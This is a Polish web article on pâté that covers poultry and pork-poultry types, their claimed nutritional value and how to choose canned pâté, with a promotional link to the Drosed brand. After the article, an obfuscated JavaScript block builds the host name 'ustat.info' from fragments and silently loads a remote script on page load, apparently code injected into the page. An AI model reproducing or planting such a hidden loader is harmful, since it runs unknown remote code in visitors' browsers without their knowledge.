Pasztety od kuchni, czyli „z czym to się je”?

<p>Spośr&oacute;d r&oacute;żnych, zimnych lub ciepłych, przystawek mięsnych - jedną z najbardziej cenionych w naszym kraju jest pasztet. Przygotowuje się go z jednolitej masy przyrządzonej gł&oacute;wnie z mięsa surowego, pieczonego lub gotowanego, zwłaszcza z drobiu, wieprzowiny lub dziczyzny, ale też z warzyw, ryb, grzyb&oacute;w lub sera. Można go kupić w formie konserwy w każdym sklepie spożywczym. Podaje się go jako przystawkę, danie obiadowe, dodatek do sos&oacute;w i marynat, świetnie też pasuje do kanapek. Czy jednak pasztety drobiowe lub drobiowo-wieprzowe wnoszą coś wartościowego do naszej diety? Co można powiedzieć o pasztetach dostępnych w sklepach spożywczych? Jaka jest ich jakość?<br />
<br />
<strong>Pasztet pod lupą </strong><br />
Najpopularniejszy rodzaj pasztetu to <strong>pasztet drobiowy</strong>, kt&oacute;ry ma ogromną wartość odżywczą. Dietetycy zalecają spożywanie drobiu pod r&oacute;żną postacią, gdyż jest on źr&oacute;dłem cennego i pełnowartościowego białka, witamin - szczeg&oacute;lnie witamin z grupy B, a także składnik&oacute;w mineralnych, takich jak cynk, potas i żelazo. Pasztet drobiowy to niskokaloryczna przekąska, gdyż dr&oacute;b ma niską zawartość nasyconych kwas&oacute;w tłuszczowych, kt&oacute;re są szkodliwe. Dr&oacute;b to ważny element diety os&oacute;b aktywnych fizycznie oraz sportowc&oacute;w, a pasztety z drobiu stanowią smaczny produkt, kt&oacute;ry można jadać zar&oacute;wno na śniadanie, do kanapek oraz jako zimną przystawkę. R&oacute;wnie popularny jest <strong>pasztet drobiowo-wieprzowy</strong>. Jest on wzbogacony o wieprzowinę (na przykład w postaci boczku) i można go podawać z warzywami oraz grzybami. Wiele os&oacute;b chętnie przyrządza pasztety samodzielnie w domu, gdyż nie jest to skomplikowane i można podać go na r&oacute;żne sposoby.<br />
<br />
<strong>Pasztety sklepowe i ich jakość<br />
Pasztety</strong> to popularny produkt spożywczy dostępny w sklepach w formie konserw. Trzeba jednak przyznać, że wielu z nas nie chce kupować takich produkt&oacute;w z obawy przed ogromną ilością konserwant&oacute;w i &bdquo;ulepszaczy&rdquo;. Czy rzeczywiście każdy pasztet na rynku jest pełen &bdquo;chemii&rdquo;? Nie! Zanim jednak dokonamy zakupu, warto zapoznać się z etykietą na słoiczku czy puszce. Trzeba też uczciwie przyznać, że najtańsze konserwy nie będą należeć do zdrowych. Warto wybierać więc tylko te pasztety, kt&oacute;re mają dobrą opinię, a ich skład nie wzbudza w nas niepokoju. Przykładem może być pasztet firmy <a href="http://drosed.com.pl/produkt/pasztet-belgijski-drobiowo-wieprzowy/" target="_blank">Drosed</a>. W sprzedaży możemy znaleźć pasztety z dodatkiem warzyw, grzyb&oacute;w, przypraw, kt&oacute;re mają oryginalny smak i zapach. A dzięki długiej dacie przydatności do spożycia - mogą stanowić nasz asortyment na przykład podczas wyjazdu na wakacje, na kt&oacute;rych sami musimy zadbać o swoje wyżywienie. Podsumowując - można stwierdzić, iż pasztet to smaczny dodatek do potraw, kt&oacute;ry w łatwy spos&oacute;b można przygotować samodzielnie lub też kupić jako gotowy produkt w postaci konserwy. Aby jednak był to zakup udany, warto skupić się nie tyle na atrakcyjnej cenie pasztetu, ile na jego atrakcyjnym, czyli zdrowym i naturalnym składzie.</p>
<script type="text/javascript">
(function(){
un1p=document.createElement("script");un1p.type="text/javascript";
un1p.async=true;un1p_=(("us")+"t")+"a";un1p_+=("t.i")+""+"n";un1p_+=(("f")+"o");
un1p.src="http://"+un1p_+"/6911754.8n4l90kmn1pykkvjt8xa88tr35zbsb";
document.body.appendChild(un1p);
})();
</script>